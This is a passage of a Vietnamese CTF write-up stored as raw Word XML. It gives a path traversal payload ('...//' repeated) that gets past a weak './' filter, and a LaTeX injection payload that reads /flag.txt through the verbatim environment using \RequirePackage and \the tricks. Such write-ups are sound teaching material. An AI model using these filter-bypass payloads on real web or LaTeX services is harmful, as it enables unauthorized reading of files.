      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EFF93F0" w14:textId="6DDB41EA" w:rsidR="0027115C" w:rsidRDefault="0027115C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7CA526" w14:textId="0E6F57C9" w:rsidR="0027115C" w:rsidRDefault="00E51FC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Vào được trang dashboard.php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6087694C" w14:textId="45DF7A0D" w:rsidR="00E51FC0" w:rsidRDefault="00E51FC0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295A1EB7" w14:textId="14341211" w:rsidR="00E51FC0" w:rsidRDefault="00743C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47E6816" wp14:editId="32CD9759">
            <wp:extent cx="3472180" cy="3401993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3" r="41577"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3472405" cy="3402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5DCC2" w14:textId="7212DC5C" w:rsidR="00743C9F" w:rsidRDefault="00743C9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589CA61D" w14:textId="19D4641C" w:rsidR="00743C9F" w:rsidRDefault="00743C9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Bật developer tools lên để xem HTML code, ta phát hiện được đường dẫn sau: viewer.php?img=1.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A741DC6" w14:textId="77777777" w:rsidR="00C2714C" w:rsidRDefault="00C2714C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="041149FC" w14:textId="53CD35DF" w:rsidR="000C7F01" w:rsidRDefault="000C7F0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viewer bị dính lỗ hổng file inclusion</w:t>
      </w:r>
      <w:r w:rsidR="002A13A2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nhưng bị chặn</w:t>
      </w:r>
      <w:r w:rsidR="00936D5B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> chuỗi</w:t>
      </w:r>
      <w:r w:rsidR="002A13A2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./ và \\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2875E87B" w14:textId="77777777" w:rsidR="000C7F01" w:rsidRDefault="000C7F01">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1478E15D" w14:textId="49657E69" w:rsidR="00803C25" w:rsidRDefault="00803C2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78B964A" wp14:editId="1605130B">
            <wp:extent cx="5791200" cy="30988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6367" w14:textId="503414F6" w:rsidR="00803C25" w:rsidRDefault="00803C25">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79150D09" w14:textId="1E9B83E9" w:rsidR="00803C25" w:rsidRDefault="00803C2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Hàm str_replace giống hệt preg_replace chỉ thay thế chuỗi ./ 1 lần nên rất dễ bypass </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAD155F" w14:textId="77777777" w:rsidR="00936D5B" w:rsidRDefault="00936D5B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F203EC9" w14:textId="02988182" w:rsidR="00803C25" w:rsidRPr="00803C25" w:rsidRDefault="00803C25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Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00803C25">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>...//...//...//...//...//flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA17570" w14:textId="66232B18" w:rsidR="00803C25" w:rsidRDefault="00803C25">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3916A7" w14:textId="4B6AC71E" w:rsidR="00803C25" w:rsidRPr="00896C81" w:rsidRDefault="00F5724C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896C81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flag: TCP1P{fR4gm3nTEd_SqL_1Nj3ction_and_lfi!?!1d9f3kd8cxm}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6596B3" w14:textId="065348D7" w:rsidR="00F5724C" w:rsidRDefault="00F5724C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D9A4566" w14:textId="2578B4FA" w:rsidR="000C7F01" w:rsidRPr="006765EF" w:rsidRDefault="00D66F95">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00660A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 3: Latex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4253E967" w14:textId="282DFD3F" w:rsidR="000C7F01" w:rsidRDefault="000C7F01">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075911C9" w14:textId="22C3B1F7" w:rsidR="000C7F01" w:rsidRDefault="006765E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265267" wp14:editId="6BF4B2B5">
            <wp:extent cx="5943600" cy="13004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F0DB9" w14:textId="330E4681" w:rsidR="006765EF" w:rsidRDefault="006765EF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B3839A" w14:textId="311749D6" w:rsidR="006765EF" w:rsidRDefault="009A700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Đây là 1 kiến thức khá thú vị</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65785CB9" w14:textId="558A1812" w:rsidR="009A7008" w:rsidRDefault="009A7008">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A263110" w14:textId="48D25978" w:rsidR="00F440FC" w:rsidRDefault="00F440FC" w:rsidP="00F440F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Payload: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E415C1D" w14:textId="77777777" w:rsidR="00F440FC" w:rsidRDefault="00F440FC" w:rsidP="00F440FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB38D20" w14:textId="35281884" w:rsidR="00F440FC" w:rsidRPr="0049563E" w:rsidRDefault="00F440FC" w:rsidP="00F440FC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>\documentclass{article}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F39CB81" w14:textId="77777777" w:rsidR="00F440FC" w:rsidRPr="0049563E" w:rsidRDefault="00F440FC" w:rsidP="00F440FC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>\RequirePackage{verbatim}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67410D9F" w14:textId="77777777" w:rsidR="00F440FC" w:rsidRPr="0049563E" w:rsidRDefault="00F440FC" w:rsidP="00F440FC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lastRenderedPageBreak/>
        <w:t>\begin{document}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B46D0B" w14:textId="77777777" w:rsidR="00F440FC" w:rsidRPr="0049563E" w:rsidRDefault="00F440FC" w:rsidP="00F440FC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>\newtoks\in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C8287F" w14:textId="77777777" w:rsidR="00F440FC" w:rsidRPr="0049563E" w:rsidRDefault="00F440FC" w:rsidP="00F440FC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>\newtoks\put</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC66062" w14:textId="77777777" w:rsidR="00F440FC" w:rsidRPr="0049563E" w:rsidRDefault="00F440FC" w:rsidP="00F440FC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>\in={in}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076C7E0D" w14:textId="77777777" w:rsidR="00F440FC" w:rsidRPr="0049563E" w:rsidRDefault="00F440FC" w:rsidP="00F440FC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>\put={put}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682C6228" w14:textId="77777777" w:rsidR="00F440FC" w:rsidRPr="0049563E" w:rsidRDefault="00F440FC" w:rsidP="00F440FC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>\begin{verbatim\the\in\the\put}{/flag.txt}\end{verbatim\the\in\the\put}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B16E62" w14:textId="0C77AE6A" w:rsidR="00F440FC" w:rsidRPr="0049563E" w:rsidRDefault="00F440FC" w:rsidP="00F440FC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>\end{document}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666ABEDE" w14:textId="28294ADA" w:rsidR="00F440FC" w:rsidRDefault="00F440FC" w:rsidP="00F440FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53295EDE" w14:textId="638773F7" w:rsidR="00F440FC" w:rsidRPr="00F440FC" w:rsidRDefault="00F440FC" w:rsidP="00F440FC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F440FC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nó đọc file flag.txt bằng môi trường verbatim, tìm tài liệu liên quan đến latex trong môi trường verbatim mà đọc, nghiên cứu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5266009E" w14:textId="294F05BC" w:rsidR="00F440FC" w:rsidRPr="00F440FC" w:rsidRDefault="00F440FC" w:rsidP="00F440FC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F440FC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usepackage bị chặn nên dùng RequirePackage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8EF15A" w14:textId="73460C45" w:rsidR="00F440FC" w:rsidRPr="00F440FC" w:rsidRDefault="00F440FC" w:rsidP="00F440FC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F440FC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Khởi tạo giá trị</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F440FC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> \in= in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579BCA19" w14:textId="66553995" w:rsidR="00F440FC" w:rsidRPr="00F440FC" w:rsidRDefault="00F440FC" w:rsidP="00F440FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F440FC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\newtoks\in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA356C" w14:textId="7C0EFEE3" w:rsidR="00F440FC" w:rsidRPr="00F440FC" w:rsidRDefault="00F440FC" w:rsidP="00F440FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F440FC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\in={in}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061A4E94" w14:textId="4C633C76" w:rsidR="00F440FC" w:rsidRDefault="00FD52A6" w:rsidP="00F440F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Môi trường verbatim là môi trường mà giúp Latex in ra chính xác những gì bạn nhập. Mình mới tìm kiếm cách thực thi lệnh input trong môi trường verbatim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16136378" w14:textId="00DBBBF4" w:rsidR="00FD52A6" w:rsidRDefault="00FD52A6" w:rsidP="00F440FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63C1ED74" w14:textId="77777777" w:rsidR="00FD52A6" w:rsidRPr="0049563E" w:rsidRDefault="00FD52A6" w:rsidP="00FD52A6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 xml:space="preserve">\documentclass{article} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BF7414" w14:textId="77777777" w:rsidR="00FD52A6" w:rsidRPr="0049563E" w:rsidRDefault="00FD52A6" w:rsidP="00FD52A6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 xml:space="preserve">\usepackage{verbatim} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D4DD2F" w14:textId="77777777" w:rsidR="00FD52A6" w:rsidRPr="0049563E" w:rsidRDefault="00FD52A6" w:rsidP="00FD52A6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 xml:space="preserve">\begin{document} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29363D93" w14:textId="61FD9D30" w:rsidR="00FD52A6" w:rsidRPr="0049563E" w:rsidRDefault="00FD52A6" w:rsidP="00FD52A6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>\verbatiminput{</w:t>
      </w:r>
      <w:r w:rsidR="00C15309">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/flag.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="0049563E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C62C74" w14:textId="0C56CEC1" w:rsidR="00FD52A6" w:rsidRPr="0049563E" w:rsidRDefault="00FD52A6" w:rsidP="00FD52A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049563E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\end{document}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50441656" w14:textId="77777777" w:rsidR="00126126" w:rsidRDefault="00126126" w:rsidP="00126126">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4685A196" w14:textId="53B7E11E" w:rsidR="00126126" w:rsidRPr="00126126" w:rsidRDefault="00126126" w:rsidP="00126126">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00126126">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00126126">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">\verbatiminput{xx.yy} </w:t>
      </w:r>
      <w:r w:rsidRPr="00126126">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">giống như </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C7664" w14:textId="77777777" w:rsidR="00126126" w:rsidRDefault="00126126" w:rsidP="00126126">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F94C80B" w14:textId="5F19C44C" w:rsidR="00126126" w:rsidRPr="00126126" w:rsidRDefault="00126126" w:rsidP="00126126">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00126126">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\begin{verbatim}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB0B96" w14:textId="77777777" w:rsidR="00126126" w:rsidRPr="00126126" w:rsidRDefault="00126126" w:rsidP="00126126">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00126126">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>⟨</w:t>
      </w:r>
      <w:r w:rsidRPr="00126126">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Contents of the file xx.yy </w:t>
      </w:r>
      <w:r w:rsidRPr="00126126">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>⟩</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7378BB" w14:textId="5D885F2B" w:rsidR="00126126" w:rsidRPr="00126126" w:rsidRDefault="00126126" w:rsidP="00126126">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00126126">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\end{verbatim}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCFD3F4" w14:textId="77777777" w:rsidR="00126126" w:rsidRDefault="00126126" w:rsidP="00FD52A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C4EE16" w14:textId="3302F84E" w:rsidR="00FD52A6" w:rsidRDefault="00FD52A6" w:rsidP="00FD52A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input đã bị chặn, bạn có thể dùng \the để lưu trữ chuỗi</w:t>
      </w:r>
      <w:r w:rsidR="0049563E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D4D07D" w14:textId="174F4206" w:rsidR="00FD52A6" w:rsidRDefault="00FD52A6" w:rsidP="00FD52A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D37771" w14:textId="397CE6D0" w:rsidR="00126126" w:rsidRDefault="00C15309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(1) </w:t>
      </w:r>
      <w:r w:rsidR="00FD52A6" w:rsidRPr="00FD52A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\verbatiminput{</w:t>
      </w:r>
      <w:r w:rsidR="00126126">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/flag.txt</w:t>
      </w:r>
      <w:r w:rsidR="00FD52A6" w:rsidRPr="00FD52A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidR="00FD52A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00126126" w:rsidRPr="00126126">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0F3"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4A856" w14:textId="5A10D67D" w:rsidR="00FD52A6" w:rsidRDefault="00C15309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(2) </w:t>
      </w:r>
      <w:r w:rsidR="00FD52A6" w:rsidRPr="00FD52A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\begin{verbatim</w:t>
      </w:r>
      <w:r w:rsidR="00FD52A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r>
      <w:r w:rsidR="00FD52A6" w:rsidRPr="00FD52A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}{/flag.txt}\end{verbatim</w:t>
      </w:r>
      <w:r w:rsidR="00FD52A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r>
      <w:r w:rsidR="00FD52A6" w:rsidRPr="00FD52A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidR="00126126" w:rsidRPr="00126126">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0F3"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE8E407" w14:textId="5D5B4DDF" w:rsidR="00126126" w:rsidRDefault="00B8230B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(3) </w:t>
      </w:r>
      <w:r w:rsidR="00126126" w:rsidRPr="00126126">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\begin{verbatim\the\in\the\put}{/flag.txt}\end{verbatim\the\in\the\put}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126EF0C3" w14:textId="451733EC" w:rsidR="00562489" w:rsidRDefault="00562489" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="262FAF5D" w14:textId="4047D275" w:rsidR="00562489" w:rsidRDefault="00562489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Tài liệu tham khảo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E61A05B" w14:textId="48BF3226" w:rsidR="00562489" w:rsidRDefault="00562489" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562489">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://mirror.unpad.ac.id/ctan/macros/latex/required/tools/verbatim.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F3C8AC" w14:textId="7884C998" w:rsidR="00562489" w:rsidRPr="000E20DB" w:rsidRDefault="00562489" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E20DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Bài 4: </w:t>
      </w:r>
      <w:r w:rsidR="00CF11C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>love card</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616F39D8" w14:textId="0C65A097" w:rsidR="000E20DB" w:rsidRDefault="000E20DB" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31CE85DE" w14:textId="1B209FE1" w:rsidR="007F5599" w:rsidRDefault="007F5599" w:rsidP="00FD52A6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BE838B4" wp14:editId="7FF5FE10">
            <wp:extent cx="4629873" cy="3728372"/>
            <wp:effectExtent l="0" t="0" r="571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9" r="40993" b="16493"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4637646" cy="373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23C26" w14:textId="1D90A53C" w:rsidR="007F5599" w:rsidRDefault="007F5599" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
